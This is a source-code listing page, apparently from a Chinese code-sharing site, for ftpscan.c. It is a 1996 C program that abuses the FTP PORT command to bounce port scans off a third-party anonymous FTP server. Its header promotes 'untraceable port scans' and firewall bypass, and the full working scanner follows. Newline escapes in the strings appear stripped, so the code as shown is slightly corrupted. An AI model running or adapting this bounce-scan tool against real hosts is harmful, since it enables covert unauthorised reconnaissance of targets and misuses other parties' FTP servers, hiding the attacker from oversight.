开通博客赚积分
发布资源赚积分
分类

源码开发语言/平台
当前位置:首页 > 源码/资料 > 系统/网络安全 > 扫描程序 > 查看源码
ftpscan.c
资源名称:ftpscan.zip [点击查看]
上传用户:tzyz868
上传日期:2007-01-05
资源大小:2k
文件大小:3k
源码类别:

扫描程序

开发平台:

Unix_Linux

ftpscan.c:源码内容
  2. /* http://www.cotse.com  Fear the swimming Elephant! */
  4. /*
  5.  * FTP Scan (C) 1996 Kit Knox <kit@connectnet.com>
  6.  *
  7.  * Exploits bug in FTP protocol that allows user to connect to arbritary
  8.  * IP address and port.
  9.  *
  10.  * Features: Untraceable port scans.  Bypass firewalls!
  11.  *
  12.  * Example usage:
  13.  *
  14.  * ftp-scan ftp.cdrom.com 127.0.0.1 0 1024
  15.  *
  16.  * This will scan IP 127.0.0.1 from ftp.cdrom.com from port 0 to 1024
  17.  *
  18.  */
  20. #include <stdio.h>
  21. #include <stdlib.h>
  22. #include <sys/param.h>
  23. #include <sys/socket.h>
  24. #include <netinet/in.h>
  25. #include <netdb.h>
  26. #include <stdarg.h>
  28. int sock;
  29. char line[1024];
  31. void rconnect(char *server)
  32. {
  33.   struct sockaddr_in sin;
  34.   struct hostent *hp;
  36.   hp = gethostbyname(server);
  37.   if (hp==NULL) {
  38.     printf("Unknown host: %sn",server);
  39.     exit(0);
  40.   }
  41.   bzero((char*) &sin, sizeof(sin));
  42.   bcopy(hp->h_addr, (char *) &sin.sin_addr, hp->h_length);
  43.   sin.sin_family = hp->h_addrtype;
  44.   sin.sin_port = htons(21);
  45.   sock = socket(AF_INET, SOCK_STREAM, 0);
  46.   connect(sock,(struct sockaddr *) &sin, sizeof(sin));
  47. }
  49. void login(void)
  50. {
  51.   char buf[1024];
  53.   sprintf(buf,"USER ftpn");
  54.   send(sock, buf, strlen(buf),0);
  55.   sleep(1);
  56.   sprintf(buf,"PASS user@n");
  57.   send(sock, buf, strlen(buf),0);
  58. }
  60. void readln(void)
  61. {
  62.   int i,done=0,w;
  63.   char tmp[1];
  65.   sprintf(line,"");
  66.   i = 0;
  67.   while (!done) {
  68.     w=read(sock,tmp, 1, 0);
  69.     if (tmp[0] != 0) {
  70.       line[i] = tmp[0];
  71.     }
  72.     if (line[i] == 'n') {
  73.       done = 1;
  74.     }
  75.     i++;
  76.   }
  77.   line[i] = 0;
  78. }
  80. void sendln(char s[1024]) {
  81.   send(sock, s, strlen(s),0);
  82. }
  84. #define UC(b)   (((int)b)&0xff)
  86. void main(int argc, char **argv)
  87. {
  88.   char buf[1024];
  89.   int i;
  90.   u_short sport,eport;
  91.   register char *p,*a;
  92.   struct hostent *hp;
  93.   struct sockaddr_in sin;
  94.   char adr[1024];
  96.   if (argc != 5) {
  97.     printf("usage: ftp-scan ftp_server scan_host loport hiportn");
  98.     exit(-1);
  99.   }
  101.   hp = gethostbyname(argv[2]);
  102.   if (hp==NULL) {
  103.     printf("Unknown host: %sn",argv[2]);
  104.     exit(0);
  105.   }
  106.   bzero((char*) &sin, sizeof(sin));
  107.   bcopy(hp->h_addr, (char *) &sin.sin_addr, hp->h_length);
  109.   rconnect(argv[1]);
  110.   /* Login anon to server */
  111.   login();
  112.   /* Make sure we are in */
  113.   for (i=0; i<200; i++) {
  114.     readln();
  115.     if (strstr(line,"230 Guest")) {
  116.       printf("%s",line);
  117.       i = 200;
  118.     }
  119.   }
  120.   a=(char *)&sin.sin_addr;
  121.   sport = atoi(argv[3]);
  122.   eport = atoi(argv[4]);
  123.   sprintf(adr,"%i,%i,%i,%i",UC(a[0]),UC(a[1]),UC(a[2]),UC(a[3]));
  124.   for (i=sport; i<eport; i++) {
  125.     sin.sin_port = htons(i);
  126.     p=(char *)&sin.sin_port;
  127.     sprintf(buf,"nPORT %s,%i,%inLISTn",adr,UC(p[0]),UC(p[1]));
  128.     sendln(buf);
  129.     sprintf(line,"");
  130.     while (!strstr(line, "150") && !strstr(line,"425")) {
  131.       readln();
  132.     }
  133.     if (strstr(line,"150")) {
  134.       printf("%i connected.n",i);
  135.     }
  136.   }
  137.   close(sock);
  138. }